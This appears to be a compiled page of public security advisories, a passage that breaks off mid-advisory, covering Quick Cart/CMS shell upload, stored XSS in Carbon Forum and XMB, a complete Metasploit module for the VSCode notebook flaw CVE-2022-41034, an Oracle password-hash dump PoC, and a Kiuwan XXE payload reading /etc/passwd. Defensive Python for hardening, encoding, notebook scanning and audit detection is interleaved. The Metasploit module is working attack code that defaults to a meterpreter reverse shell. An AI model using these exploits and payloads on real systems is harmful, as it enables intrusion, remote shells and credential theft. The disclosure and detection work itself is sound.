<pre><code># Title : Authenticated Remote Code Execution & Shell Upload<br /># Product : Quick Cart<br /># Vendor : https://opensolution.org/<br /># Affected Version : 6.7<br /># Researcher : Eagle Eye<br /># Tested on : Windows & Linux<br /># Date : 11/06/2024<br /># Affected path : admin.php, core/common-admin.php, database/config.php<br /># Affected function : saveVariables()<br /># Report : Vendor already contacted, no response<br /><br /># Description : An unfiltered parameter posted to admin.php?p=tools-config can override any<br />$config key value. This allows unwanted file inclusion and overriding of the allowed file extensions,<br />leading to remote code execution.<br /># Steps to reproduce (Method 1)<br />- Log in at admin.php<br />- Click Products, then New Product in the top navbar<br />- On the right panel, choose Add file<br />- Upload the malicious script with extension txt or any other allowed extension, e.g. jpg<br />- Click Settings at the top right<br />- Click Save and intercept the request<br />- In the body parameters, add &default_pages_template=../../files/yourmaliciousfile.txt and proceed<br /># Steps to reproduce (Method 2)<br />- Log in at admin.php<br />- Click Settings at the top right<br />- Click Save and intercept the request<br />- In the body parameters, add &allowed_extensions=php and proceed<br />- Click Products, then New Product in the top navbar<br />- On the right panel, choose Add file<br />- You can now upload a malicious script with extension php; it is reachable at a path such as http://website.com/files/shell.php<br /></code></pre>
<pre><code># Title : Authenticated Shell Upload<br /># Product : Quick CMS<br /># Vendor : https://opensolution.org/<br /># Affected Version : 6.7<br /># Researcher : Eagle Eye<br /># Tested on : Windows & Linux<br /># Date : 11/06/2024<br /># Report : Vendor already contacted, no response<br /># Affected path : admin.php, core/common-admin.php, database/config.php<br /># Affected function : saveVariables()<br /># Description : An unfiltered parameter posted to admin.php?p=settings can override any<br />$config key value. This allows overriding the allowed file upload extensions,<br />leading to shell upload.<br /># Steps to reproduce<br />- Log in at admin.php<br />- Click Settings at the top right<br />- Click Save and intercept the request<br />- In the body parameters, add &allowed_not_image_extensions=php and proceed<br />- Click Pages, then New page in the top navbar<br />- On the panel, choose Add files<br />- You can now upload a malicious script with extension php; it is reachable at a path such as http://website.com/files/shell.php<br /></code></pre>
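<p>The two Quick Cart / Quick CMS entries above share one root cause: the settings handler writes every posted field into $config, so an administrator-level request can redefine keys the form never exposes (allowed_extensions, allowed_not_image_extensions, default_pages_template). The Python model below is an added example written for this page, not Quick Cart or Quick CMS code. It places a mass-assignment save beside a hardened save that accepts only declared keys, rejects executable upload extensions, and confines the template setting to a bare file name inside an assumed templates directory. The key names come from the advisories; DEFAULT_CONFIG, EDITABLE_KEYS, EXECUTABLE_EXTENSIONS and TEMPLATE_DIR are assumptions.</p>

```python
"""Illustrative settings-save handler (constructed for this page, not the product's code):
a mass-assignment version that copies every posted field into the config, beside a
hardened version that only accepts declared keys and validates each value."""
import posixpath

# Constructed baseline configuration using the key names named in the advisories.
DEFAULT_CONFIG = {
    "site_name": "Shop",
    "default_pages_template": "default.html",
    "allowed_extensions": "jpg,png,gif,pdf,txt",
    "allowed_not_image_extensions": "pdf,txt",
}

# Extensions the web server would execute; never accept them as uploadable types (assumed list).
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl"}
# Keys an administrator may change through the settings form (assumed allowlist).
EDITABLE_KEYS = {"site_name", "default_pages_template",
                 "allowed_extensions", "allowed_not_image_extensions"}
TEMPLATE_DIR = "templates"  # assumed location of page templates


def save_variables_vulnerable(config, post):
    """Mass assignment: every posted field overrides a config key, whatever its name."""
    new = dict(config)
    new.update(post)
    return new


def _valid_template(value):
    # Must be a bare .html file name that resolves inside TEMPLATE_DIR (no traversal).
    if not value or value != posixpath.basename(value):
        return False
    resolved = posixpath.normpath(posixpath.join(TEMPLATE_DIR, value))
    return resolved.startswith(TEMPLATE_DIR + "/") and resolved.endswith(".html")


def _valid_extension_list(value):
    # Comma-separated alphanumeric extensions, none of which the server executes.
    exts = [e.strip().lower() for e in value.split(",") if e.strip()]
    return bool(exts) and all(e.isalnum() and e not in EXECUTABLE_EXTENSIONS for e in exts)


VALIDATORS = {
    "site_name": lambda v: 0 < len(v) <= 100,
    "default_pages_template": _valid_template,
    "allowed_extensions": _valid_extension_list,
    "allowed_not_image_extensions": _valid_extension_list,
}


def save_variables_hardened(config, post):
    """Returns (new_config, rejected); rejected maps each refused key to a reason.
    Unknown keys are refused outright, known keys must pass their validator."""
    new = dict(config)
    rejected = {}
    for key, value in post.items():
        if key not in EDITABLE_KEYS:
            rejected[key] = "not an editable setting"
            continue
        if not VALIDATORS[key](str(value)):
            rejected[key] = "invalid value"
            continue
        new[key] = str(value)
    return new, rejected
```

<p>The hardened version would have stopped both methods in the advisories: the extension lists cannot be widened to php, and default_pages_template cannot point outside the template directory, so a file that did get uploaded under an allowed extension is never included as a template.</p>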
<pre><code># Exploit Title: Persistent XSS in Carbon Forum 5.9.0 (Stored)<br /># Date: 06/12/2024<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.94cb.com/<br /># Software Link: https://github.com/lincanbin/Carbon-Forum<br /># Version: 5.9.0<br /># Tested on: Windows XP<br /># CVE: N/A<br /><br />## Vulnerability Details<br /><br />A persistent (stored) XSS vulnerability was discovered in Carbon Forum<br />version 5.9.0. The vulnerability allows an attacker to inject malicious<br />JavaScript code into the Forum Name field under the admin settings. This<br />payload is stored on the server and executed in the browser of any user who<br />visits the forum, leading to potential session hijacking, data theft, and<br />other malicious activities.<br /><br />## Steps to Reproduce<br /><br />1. Login as Admin: Access the Carbon Forum with admin privileges.<br />2. Navigate to Settings: Go to the '/dashboard' and select the Basic<br />section.<br />3. Enter Payload: Input the following payload in the Forum Name field:<br /><br /> <script>alert('XSS');</script><br /><br />4. Save Settings: Save the changes.<br />5. Trigger the Payload: The XSS payload will trigger.<br /></code></pre>
<pre><code># Exploit Title: Persistent XSS in XMB 1.9.12.06<br /># Date: 06/12/2024<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.xmbforum2.com/<br /># Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip<br /># Version: 1.9.12.06<br /># Tested on: Windows XP<br /># CVE: N/A<br /><br />## Vulnerability Details<br /><br />A persistent (stored) XSS vulnerability was discovered in XMB 1.9.12.06.<br />The vulnerability allows an attacker to inject malicious JavaScript code<br />into a template or specific fields. This payload is stored on the server<br />and executed in the browser of any user who visits the forum, leading to<br />potential session hijacking, data theft, and other malicious activities.<br /><br />### XSS in Template<br /><br />An attacker can inject malicious JavaScript code into a template:<br /><br />1. Login as Admin: Access the XMB Forum with admin privileges.<br />2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Look &<br />Feel" select "Templates". This will go to `/cp2.php?action=templates`.<br />Select the "footer" template and click edit.<br />3. Enter Payload: Add the XSS payload in the footer template:<br /><br /><br /> <script>alert('XSS');</script><br /><br /><br />4. Save the Change: Click "Submit Changes".<br />5. Trigger the Payload: The XSS payload will trigger anywhere the footer<br />template is rendered.<br /><br />### XSS in News Ticker<br /><br />An attacker can inject malicious JavaScript code into the News Ticker field<br />of the Front Page Options:<br /><br />1. Login as Admin: Access the XMB Forum with admin privileges.<br />2. Navigate to the Administration Panel: Go to `/cp.php`, then in<br />"Settings" go to "Front Page Options".<br />3. Enter Payload: Add the XSS payload in the "News in Newsticker" field:<br /><br /> <img src=x onerror=alert(1)><br /><br /><br />4. Save the Change: Click "Submit Changes".<br />5. Trigger the Payload: The XSS payload will trigger anywhere the News<br />Ticker is displayed, e.g. the home page<br /></code></pre>
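<p>Both forum advisories above (and the reflected XSS on the Kiuwan login page later on this page, where a request parameter lands inside a JavaScript block) come down to the same defect: an admin-controlled or request-controlled string reaches the page without being encoded for the context in which it is rendered. The Python below is an added example, not code from Carbon Forum or XMB. for_html() covers text and double-quoted attribute contexts, for_js_string() covers a value rendered as a JavaScript string literal inside a script block, and contains_markup() is a save-time check for settings such as a forum name or news ticker that have no business containing tags or event handlers. render_forum_header() and the sample values are constructed.</p>

```python
"""Context-aware output encoding for admin-controlled settings, plus a save-time
markup check. Added illustration written for this page; generic, not forum code."""
import html
import json
import re

# Tags, event-handler attributes and javascript: URLs; none belong in a plain-text setting.
_MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z!]|\bon[a-zA-Z]+\s*=|javascript\s*:", re.IGNORECASE)


def for_html(value):
    """Value rendered as element text or inside a double-quoted attribute.
    quote=True also encodes ' and \" so the value cannot close an attribute."""
    return html.escape(value, quote=True)


def for_js_string(value):
    """Value rendered inside a <script> block as a JS string literal.
    json.dumps produces a complete quoted literal (ensure_ascii escapes non-ASCII,
    including U+2028/U+2029); '<', '>' and '&' are additionally escaped so the
    value can neither terminate the script element nor be read as markup."""
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def contains_markup(value):
    """True if a setting value carries markup; reject such values at save time."""
    return bool(_MARKUP.search(value))


def render_forum_header(forum_name, news_ticker):
    """Constructed header snippet: each insertion uses the encoder for its context."""
    return (
        f"<title>{for_html(forum_name)}</title>\n"
        f'<div class="ticker" data-name="{for_html(forum_name)}">{for_html(news_ticker)}</div>\n'
        f"<script>var forumName = {for_js_string(forum_name)};</script>"
    )
```

<p>Encoding at render time is the control that actually closes the hole; the save-time check is a second line of defence that also gives a detection signal, since a forum name or news ticker containing a tag is itself worth an alert.</p>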
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpServer<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'VSCode ipynb Remote Development RCE',<br /> 'Description' => %q{<br /> VSCode, when opening a Jupyter notebook (.ipynb) file, bypasses the trust model.<br /> On versions v1.4.0 - v1.71.1, it is possible for the Jupyter notebook to embed<br /> HTML and JavaScript, which can then open new terminal windows within VSCode.<br /> Each of these new windows can then execute arbitrary code at startup.<br /><br /> During testing, the first open of the Jupyter notebook resulted in pop-ups<br /> displaying errors that the payload exe file could not be found. The second attempt<br /> at opening the Jupyter notebook would result in successful execution.<br /><br /> Successfully tested against VSCode 1.70.2 on Windows 10.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # metasploit module<br /> 'Zemnmez'<br /> ],<br /> 'References' => [<br /> ['URL', 'https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m'],<br /> ['CVE', '2022-41034'],<br /> ['URL', 'https://github.com/andyhsu024/CVE-2022-41034']<br /> ],<br /> 'DisclosureDate' => '2022-11-22',<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_CMD,<br /> 'Stance' => Stance::Aggressive,<br /> 'Payload' => { 'BadChars' => '&"' },<br /> 'Targets' => [<br /> [<br /> 'Windows',<br /> {<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'<br /> }<br /><br /> }<br /> ],<br /> [<br /> 'Linux File-Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br 
/> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 3_600, # 1hr<br /> 'URIPATH' => 'project.ipynb'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> # on windows it will say the final payload can't be found<br /> # however, it is, seems to be a timing issue, 2nd exploit attempt<br /> # works perfectly<br /> 'Reliability' => [REPEATABLE_SESSION, FIRST_ATTEMPT_FAIL],<br /> 'SideEffects' => [SCREEN_EFFECTS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('PAYLOAD_FILENAME', [ false, 'Name of the payload file - only required when exploiting on Linux.', 'shell.sh' ]),<br /> OptString.new('WRITABLE_DIR', [ false, 'Name of the writable directory containing the payload file - required when exploiting on Linux .', '/tmp/' ]),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> CheckCode::Unsupported<br /> end<br /><br /> def exploit<br /> unless datastore['URIPATH'].end_with? '.ipynb'<br /> fail_with(Failure::BadConfig, 'URIPATH must end in .ipynb for exploit to be successful')<br /> end<br /> print_status('Starting up web service...')<br /> start_service<br /> sleep(datastore['WFSDELAY'])<br /> end<br /><br /> def on_request_uri(cli, request)<br /> super unless request.uri.end_with? 
datastore['URIPATH']<br /><br /> if target['Platform'] == 'win'<br /> config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }<br /> else<br /> config = { 'executable' => "/#{datastore['WRITABLE_DIR']}/#{datastore['PAYLOAD_FILENAME']}" }<br /> end<br /><br /> pload = JSON.dump({ 'config' => config })<br /> pload = CGI.escape(pload).gsub('+', '%20') # XXX not sure if this is needed or not, but it works<br /><br /> ipynb = %|{<br />"cells": [<br /> {<br /> "cell_type": "markdown",<br /> "metadata": {},<br /> "source": [<br /> "<img src=a onerror=\\"let q = document.createElement('a');q.href='command:workbench.action.terminal.new?#{pload}';document.body.appendChild(q);q.click()\\"/>"<br /> ]<br /> }<br />]}|<br /><br /> send_response(cli, ipynb, {<br /> 'Connection' => 'close',<br /> 'Pragma' => 'no-cache',<br /> 'Access-Control-Allow-Origin' => '*'<br /> })<br /><br /> print_status("Sent #{datastore['URIPATH']} to #{cli.peerhost}")<br /> end<br /><br />end<br /></code></pre>
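<p>The module above delivers its payload as a markdown cell whose raw HTML carries an onerror handler that builds a command: link. A practitioner who wants to screen notebooks before they are opened (in a mail gateway, a repository hook, or an editor extension) can look for exactly those artefacts. The Python below is an added example written for this page, not part of the Metasploit module or of VS Code: it parses the notebook JSON, joins each markdown cell's source, and reports event-handler attributes, command: URIs and script tags. Both notebooks in the block are constructed, and the command argument in the suspect one is a placeholder.</p>

```python
"""Screen a Jupyter notebook for markdown cells carrying active HTML of the kind
the module above embeds. Added example; sample notebooks are constructed."""
import json
import re

# Patterns searched in markdown cell source (case-insensitive). Markdown cells are
# the ones whose raw HTML the editor renders, so they are the only ones inspected.
SUSPICIOUS = {
    "event_handler": re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE),
    "command_uri": re.compile(r"command:[a-z0-9_.]+", re.IGNORECASE),
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
}


def _cell_text(cell):
    # nbformat allows "source" to be a single string or a list of lines.
    src = cell.get("source", "")
    return "".join(src) if isinstance(src, list) else src


def scan_notebook(raw):
    """Returns a list of (cell_index, finding_name, matched_text) for notebook JSON."""
    nb = json.loads(raw)
    findings = []
    for idx, cell in enumerate(nb.get("cells", [])):
        if cell.get("cell_type") != "markdown":
            continue
        text = _cell_text(cell)
        for name, pattern in SUSPICIOUS.items():
            match = pattern.search(text)
            if match:
                findings.append((idx, name, match.group(0)))
    return findings


# Constructed samples: a benign notebook and one shaped like the module's cell
# (onerror handler building a command: link; the command argument is a placeholder).
BENIGN = json.dumps({"cells": [
    {"cell_type": "markdown", "metadata": {}, "source": ["# Notes\n", "Plain *markdown* only."]},
    {"cell_type": "code", "metadata": {}, "source": ["print('hello')"]},
]})
SUSPECT = json.dumps({"cells": [
    {"cell_type": "markdown", "metadata": {},
     "source": ["<img src=a onerror=\"let q=document.createElement('a');"
                "q.href='command:workbench.action.terminal.new?PLACEHOLDER';q.click()\"/>"]},
]})
```

<p>A notebook that trips the command_uri or event_handler rule should be opened only in a workspace that is not trusted, or not at all, until someone has read the cell; the finding tuple gives the cell index so the reviewer can go straight to it.</p>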
<pre><code>Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c<br />Tested Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c<br />Risk Level: Medium<br />Solution Status: Fixed<br />CVE Reference: CVE-2020-2969<br />Base Score: 6.6 <br />Author of Advisory: Emad Al-Mousa<br /><br /><br />*****************************************<br />Vulnerability Details:<br /><br />Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.<br /><br />The presented scenario illustrates that an account with the “DBA” role can still view/extract the password hashes, although the account can’t directly query the SYS.USER$ table: as a security enhancement, the “select any dictionary” system privilege no longer provides access to SYS.USER$.<br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />This simulation was performed in an Oracle non-CDB environment; it is of course also applicable in a CDB setup.<br /><br />SQL> create user ninja identified by hello_123;<br /><br /><br />SQL> grant create session to ninja;<br /><br /><br />SQL> grant dba to ninja;<br /><br /><br />SQL> alter user ninja default role all;<br /><br /><br />*** When attempting to select from SYS.USER$, the account will not be able to, since the “SELECT ANY DICTIONARY” system privilege was changed to restrict direct access to multiple SYS tables such as USER$, ENC$, DEFAULT_PWD$, LINK$, USER_HISTORY$, CDB_LOCAL_ADMINAUTH$<br /><br />SQL> select * from sys.user$;<br />select * from sys.user$<br /> *<br />ERROR at line 1:<br />ORA-01031: insufficient privileges<br /><br />** I will perform a dump of the system datafile to gain access to the hashed passwords<br /><br />SQL> alter system dump datafile 1 block min 210 block max 215;<br /><br />** Then immediately I will check the generated trace file name using the query:<br /><br />SQL> select * from v$diag_info where NAME='Default Trace File';<br /><br />** I will query the “payload” column of the view V$DIAG_TRACE_FILE that will read the generated trace file contents:<br /><br />SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_6029.trc';<br /><br />// the password hash will be exposed in the trace file !<br /><br />After applying the Oracle July 2020 CPU patches, try to re-simulate:<br /><br />SQL> create user ninja identified by hello_123;<br /> <br /> <br />SQL> grant create session to ninja;<br /> <br /> <br />SQL> grant dba to ninja;<br /> <br /> <br />SQL> alter user ninja default role all;<br /> <br /> <br />SQL> show user<br />USER is "NINJA"<br /><br />SQL> select * from sys.user$;<br />select * from sys.user$<br /> *<br />ERROR at line 1:<br />ORA-01031: insufficient privileges<br /> <br /> <br />SQL> alter system dump datafile 1 block min 210 block max 215;<br />alter system dump datafile 1 block min 210 block max 215<br />*<br />ERROR at line 1:<br />ORA-01031: insufficient privileges<br /> <br />SQL> select * from v$diag_info where NAME='Default Trace File';<br /> <br /> INST_ID NAME<br />---------- ----------------------------------------------------------------<br />VALUE<br />--------------------------------------------------------------------------------<br /> CON_ID<br />----------<br /> 1 Default Trace File<br />/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171<br />16.trc<br /> <br /><br />SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ora5_ora_117116.trc';<br /> <br />PAYLOAD<br 
/>--------------------------------------------------------------------------------<br />Trace file <br />/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171<br />16.trc<br /> <br />Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production<br />Version 19.8.0.0.0<br />Build label: RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702<br />ORACLE_HOME: /oraclex/oradbp05/product/19.3<br />System name: Linux<br />Node name: boba<br />Release: 3.10.0-1127.13.1.el7.x86_64<br />Version: #1 SMP Fri Jun 12 14:34:17 EDT 2020<br /> <br />PAYLOAD<br />--------------------------------------------------------------------------------<br />Machine: x86_64<br />Instance name: ora5<br />Redo thread mounted by this instance: 1<br />Oracle process number: 69<br />Unix process pid: 117116, image: oracle@boba (TNS V1-V3)<br /> <br /> <br />*** 2020-07-16T11:09:31.240875+03:00<br /> <br />*** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00<br />*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00<br /> <br />PAYLOAD<br />--------------------------------------------------------------------------------<br />*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00<br />*** MODULE NAME:(SQL*Plus) 2020-07-16T11:09:31.240938+03:00<br />*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00<br />*** CLIENT DRIVER:(SQL*PLUS) 2020-07-16T11:09:31.240948+03:00<br /> <br />Error: file 1 can only be dumped with SYSDBA privillege<br /><br /><br /><br />*****************************************<br />References:<br />https://www.oracle.com/security-alerts/cpujul2020.html<br />https://www.oracle.com/security-alerts/cpujul2020verbose.html<br />https://nvd.nist.gov/vuln/detail/CVE-2020-2969<br />https://databasesecurityninja.wordpress.com/2024/06/10/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role/<br /><br /><br /><br /></code></pre>
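<p>The PoC above is a short, recognisable statement sequence: a failed read of SYS.USER$, an ALTER SYSTEM DUMP DATAFILE, then a read of the trace file through V$DIAG_TRACE_FILE_CONTENTS. Where the July 2020 CPU cannot be applied at once, auditing that sequence is the practical compensating control. The Python below is an added example, not part of the advisory: it classifies audit rows against those three patterns and raises alerts for sessions that are not connected AS SYSDBA. The rows are constructed in a simplified tab-separated layout (timestamp, user, administrative privilege, SQL text), not Oracle's audit trail format; the timestamps and the APP_USER row are invented.</p>

```python
"""Detection rules for the datafile-dump route to password hashes shown above.
Added example; audit rows are constructed in a simplified layout, not Oracle's."""
import re

# SYS tables the advisory lists as no longer reachable through SELECT ANY DICTIONARY.
PROTECTED_TABLES = ("USER$", "ENC$", "DEFAULT_PWD$", "LINK$",
                    "USER_HISTORY$", "CDB_LOCAL_ADMINAUTH$")

# Rules are evaluated on whitespace-normalised, upper-cased SQL text.
RULES = [
    ("datafile_dump", re.compile(r"\bALTER\s+SYSTEM\s+DUMP\s+(DATAFILE|LOGFILE)\b")),
    ("trace_file_read", re.compile(r"\bV\$DIAG_TRACE_FILE_CONTENTS\b")),
    ("protected_dictionary_access", re.compile(
        r"\bSYS\.(" + "|".join(re.escape(t) for t in PROTECTED_TABLES) + r")(?![A-Z0-9_$])")),
]


def normalize_sql(sql):
    return re.sub(r"\s+", " ", sql).strip().upper()


def classify(sql):
    """Names of every rule the statement matches, in RULES order."""
    text = normalize_sql(sql)
    return [name for name, pattern in RULES if pattern.search(text)]


def parse_row(line):
    # Constructed layout: timestamp, database user, administrative privilege, SQL text.
    ts, user, privilege, sql = line.split("\t", 3)
    return {"ts": ts, "user": user, "privilege": privilege, "sql": sql}


def find_alerts(lines):
    """(timestamp, user, rule) for each match by a session not connected AS SYSDBA;
    dumps by SYSDBA are expected maintenance and are not reported."""
    alerts = []
    for line in lines:
        row = parse_row(line)
        if row["privilege"] == "SYSDBA":
            continue
        for rule in classify(row["sql"]):
            alerts.append((row["ts"], row["user"], rule))
    return alerts


# Constructed sample mirroring the PoC sequence by NINJA, plus two control rows.
SAMPLE_AUDIT = [
    "2020-07-16T11:09:20\tNINJA\tNONE\tselect * from sys.user$",
    "2020-07-16T11:09:25\tNINJA\tNONE\talter system dump datafile 1 block min 210 block max 215",
    "2020-07-16T11:09:28\tNINJA\tNONE\tselect * from v$diag_info where NAME='Default Trace File'",
    "2020-07-16T11:09:31\tNINJA\tNONE\tselect payload from V$DIAG_TRACE_FILE_CONTENTS "
    "where TRACE_FILENAME='ora5_ora_117116.trc'",
    "2020-07-16T11:20:00\tSYS\tSYSDBA\talter system dump datafile 1 block min 210 block max 215",
    "2020-07-16T11:21:00\tAPP_USER\tNONE\tselect count(*) from orders",
]
```

<p>Any single rule firing for a non-SYSDBA account is worth a look; all three from the same user inside a few minutes, as in the sample, is the pattern of the advisory and should page someone. After the patch the dump itself fails with ORA-01031, but the attempt is still the useful signal.</p>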
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240606-0 ><br />=======================================================================<br /> title: Multiple critical vulnerabilities<br /> product: Kiuwan SAST on-premise (KOP) & cloud/SaaS<br /> Kiuwan Local Analyzer (KLA)<br /> vulnerable version: Kiuwan SAST <2.8.2402.3<br /> Kiuwan Local Analyzer <master.1808.p685.q13371<br /> Kiuwan SaaS before 2024-02-05<br /> fixed version: Kiuwan SAST 2.8.2402.3<br /> Kiuwan Local Analyzer master.1808.p685.q13371<br /> Kiuwan SaaS after 2024-02-05<br /> CVE number: CVE-2023-49110, CVE-2023-49111, CVE-2023-49112<br /> CVE-2023-49113<br /> impact: critical<br /> homepage: https://www.kiuwan.com<br /> found: 2022-10-28<br /> by: C. Schwarz (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Thorough code inspection is essential for designing secure software products.<br />While your development team may not have time to comb through every line of code,<br />Kiuwan does. For 20 years, it has been the choice of developers to scan code<br />automatically and remediate defects according to security standards like OWASP,<br />CWE, SANS, and CERT.<br /><br />Static application security testing (SAST) scans for security flaws in the source<br />code without running the program. It is a white-box testing method that is the<br />counterpart to dynamic application software testing (DAST), which tests web applications<br />for run-time vulnerabilities. [...]<br /><br />Our code vulnerability scanning tools create an all-encompassing process that<br />begins in the early stages of development and continues into production. 
Kiuwan’s<br />static application security testing software fits perfectly into any DevOps environment.<br />It uses a distributed engine and fast analysis to silently add security without<br />causing a bottleneck in your workflows. [...]"<br /><br />Source: https://www.kiuwan.com/code-security-sast/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version for Kiuwan On-Premise (master.1808.p685.q13371)<br />which should be installed immediately.<br /><br />Although initially communicated otherwise during responsible disclosure in 2022-2023<br />(see timeline below), the vendor confirmed in 2024 that the SaaS/cloud version is affected<br />and will also be patched. The patch date was 2024-02-05, version 2.8.2402.3.<br /><br />An in-depth security analysis performed by security professionals is highly advised,<br />to identify and resolve potential further critical security issues and to verify whether<br />the developed patches really mitigate the identified critical security issues.<br /><br />SEC Consult also submitted further security issues to Kiuwan, such as Docker-related<br />configuration issues which were also fixed during our responsible disclosure.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) XML External Entity Injection (CVE-2023-49110)<br />When the Kiuwan Local Analyzer uploads the scan results to the web app (either<br />on-premises or cloud/SaaS solution), the transmitted data consists of a ZIP<br />archive containing several files, some of them in the XML file format.<br />During Kiuwan's server-side processing of these XML files, it resolves external<br />XML entities, resulting in an XML external entity injection attack.<br /><br />An attacker with privileges to scan source code within the "Code Security"<br />module is able to extract any files of the operating system with the rights<br />of the application server user and is 
potentially able to gain sensitive files,<br />such as configuration and passwords. Furthermore, this vulnerability also<br />allows an attacker to initiate connections to internal systems, e.g. for<br />port scans or accessing other internal functions / applications such as the<br />Wildfly admin console of Kiuwan.<br /><br /><br />2) Services running as root<br />The Kiuwan web app process is configured to run with root privileges. In case<br />an attacker can compromise the application (such as documented in 1), this<br />provides them with unrestricted access to the system.<br /><br /><br />3) Reflected Cross-Site-Scripting (CVE-2023-49111)<br />For Kiuwan installations with SSO (single sign-on) enabled, an unauthenticated<br />reflected cross-site scripting attack can be performed on the login page. This<br />is possible due to some request parameter values being directly included in a<br />JavaScript block in the response. This is especially critical in business<br />environments using AD SSO authentication, e.g. via ADFS, where attackers<br />could potentially steal AD passwords.<br /><br /><br />4) Insecure Direct Object Reference (CVE-2023-49112)<br />Kiuwan provides an API endpoint to get information about any application,<br />providing only its name. This endpoint lacks proper access control mechanisms,<br />allowing other authenticated users to read information about applications, even<br />though they have not been granted the necessary rights to do so.<br /><br /><br />5) Sensitive Data Stored Insecurely (CVE-2023-49113)<br />The Kiuwan Local Analyzer (KLA) Java application contains several hard-coded secrets in<br />plain text format. 
In some cases, this can potentially compromise the confidentiality<br />of the scan results.<br /><br /><br />Proof of concept:<br />-----------------<br />1) XML External Entity Injection (CVE-2023-49110)<br />The scan results of the Kiuwan Local Analyzer (KLA) are transmitted to the Kiuwan<br />server (KOP on-premise or SaaS) using several XML files packed in a ZIP archive. Even<br />though the initial upload only contains encrypted .bxml files, the server also parses<br />regular XML files if they are present. A valid result archive with regular XML files<br />can be obtained by clicking on the analysis code within the analysis log feature in<br />the web GUI.<br /><br />[ screenshot xxe1.png ]<br /><br />Then, any XML file inside this archive can be weaponized with an XXE payload.<br />The following snippet is taken from a manipulated metrics_python.xml file to<br />exfiltrate the /etc/passwd file of the server:<br /><br /><?xml version='1.0' encoding='UTF-8'?><br /><!DOCTYPE replace [<br /><!ENTITY xxe SYSTEM "file:///etc/passwd"><br />]><br /><MetricReport technology='python'><br /><ConfidenceFactors><br /><GlobalConf>100.0</GlobalConf><br /></ConfidenceFactors><br /><ResumenGenerico><br />---[SNIP]---<br /><high>100</high><br /><unit>%</unit><br /><category>documentation</category><br /></MetricDefinition><br /></MetricDefinitions><br /><Items><br /><Item id='0' type='system'>metrics: python</Item><br /><Item id='1' parent='0' type='program'>&xxe;</Item><br /><Item id='2' parent='0' type='program'>plugins/engines/smarty.py</Item><br /><Item id='3' parent='0' type='program'>plugins/legacy_engines/__init__.py</Item><br />---[SNIP]---<br /><br />After re-uploading the malicious archive, the server parses the XML files and<br />triggers the XXE injection. 
